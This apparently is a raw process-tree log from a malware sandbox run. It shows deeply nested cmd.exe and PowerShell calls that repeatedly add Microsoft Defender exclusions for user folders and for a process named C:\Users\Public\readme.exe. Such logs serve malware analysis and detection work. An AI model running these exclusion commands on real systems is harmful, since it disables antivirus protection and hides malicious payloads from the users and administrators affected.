C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music51⤵PID:7004
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads50⤵PID:5356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads51⤵PID:4180
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents50⤵PID:5404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents51⤵PID:784
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public50⤵PID:1820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public51⤵PID:4540
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe50⤵PID:4472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe51⤵PID:6020
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp50⤵PID:5676
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp51⤵PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop50⤵PID:6092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop51⤵PID:4772
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads50⤵PID:6240
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads51⤵PID:2244
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local50⤵PID:4216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local51⤵PID:7592
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music47⤵PID:5632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music48⤵PID:3152
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads47⤵PID:7652
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads48⤵PID:6628
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents47⤵PID:4580
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents48⤵PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public47⤵PID:7244
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public48⤵PID:7288
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe47⤵PID:3228
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe48⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp47⤵PID:4900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp48⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop47⤵PID:6152
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop48⤵PID:5848
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads47⤵PID:5276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads48⤵PID:5224
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music44⤵PID:5464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music45⤵PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads44⤵PID:6108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads45⤵PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents44⤵PID:4016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents45⤵PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public44⤵PID:7092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public45⤵PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe44⤵PID:3176
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe45⤵PID:424
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp44⤵PID:1268
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp45⤵PID:8104
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop44⤵PID:8164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop45⤵PID:2588
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local44⤵PID:5400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local45⤵PID:6704
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music41⤵PID:5752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music42⤵PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads41⤵PID:6280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads42⤵PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents41⤵PID:2912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents42⤵PID:7956
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public41⤵PID:4244
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public42⤵PID:6952
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe41⤵PID:952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe42⤵PID:5884
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp41⤵PID:5804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp42⤵PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop41⤵PID:1196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop42⤵PID:7036
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads41⤵PID:2052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads42⤵PID:4516
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music38⤵PID:7596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music39⤵PID:8060
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads38⤵PID:3580
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads39⤵PID:6220
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents38⤵PID:6936
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents39⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe38⤵PID:7080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe39⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp38⤵PID:6324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp39⤵PID:5680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local40⤵PID:4960
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop38⤵PID:5964
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop39⤵PID:7944
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads38⤵PID:7916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads39⤵PID:4992
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local38⤵PID:4832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local39⤵PID:2736
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music35⤵PID:7816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music36⤵PID:6876
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads35⤵PID:7800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads36⤵PID:3380
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents35⤵PID:7616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents36⤵PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public35⤵PID:7592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public36⤵PID:6236
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp35⤵PID:6452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp36⤵PID:6004
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop35⤵PID:3008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop36⤵PID:7156
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads35⤵PID:7668
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads36⤵PID:7120
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local35⤵PID:6156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music32⤵PID:6180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music33⤵PID:6528
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads32⤵PID:2220
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads33⤵PID:7708
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents32⤵PID:6396
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents33⤵PID:6656
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public32⤵PID:5708
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public33⤵PID:6796
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe32⤵PID:3100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe33⤵PID:7632
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp32⤵PID:3468
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp33⤵PID:5632
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop32⤵PID:404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop33⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads32⤵PID:5500
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads33⤵PID:6556
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local32⤵PID:5564
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local33⤵PID:6928
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music29⤵PID:5132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music30⤵PID:7504
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads29⤵PID:5428
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads30⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents29⤵PID:3608
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents30⤵PID:4592
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public29⤵PID:5372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public30⤵PID:7340
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe29⤵PID:1092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe30⤵PID:7684
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp29⤵PID:4480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp30⤵PID:7352
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop29⤵PID:6080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop30⤵PID:7676
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads29⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local29⤵PID:2024
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local30⤵PID:7876
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music26⤵PID:3892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music27⤵PID:2912
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads26⤵PID:3716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads27⤵PID:4744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp28⤵PID:7076
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents26⤵PID:4712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents27⤵PID:6148
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public26⤵PID:6292
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public27⤵PID:5224
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe26⤵PID:2724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe27⤵PID:5228
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp26⤵PID:4852
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp27⤵PID:3384
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop26⤵PID:5776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop27⤵PID:6788
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads26⤵PID:2744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads27⤵PID:6956
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local26⤵PID:812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local27⤵PID:632
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music23⤵PID:6140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music24⤵PID:6400
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads23⤵PID:5812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads24⤵PID:5388
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents23⤵PID:6940
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents24⤵PID:4528
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public23⤵PID:2144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public24⤵PID:7952
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe23⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp23⤵PID:7000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp24⤵PID:3512
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop23⤵PID:6612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop24⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads23⤵PID:6472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads24⤵PID:1384
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local23⤵PID:6516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local24⤵PID:3592
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music20⤵PID:8156
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music21⤵PID:6992
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads20⤵PID:8148
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads21⤵PID:6380
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents20⤵PID:8140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents21⤵PID:6812
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public20⤵PID:8132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public21⤵PID:6916
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe20⤵PID:8124
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe21⤵PID:5680
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp20⤵PID:8116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp21⤵PID:7092
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop20⤵PID:8108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop21⤵PID:6676
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads20⤵PID:8100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads21⤵PID:6572
-
-
-
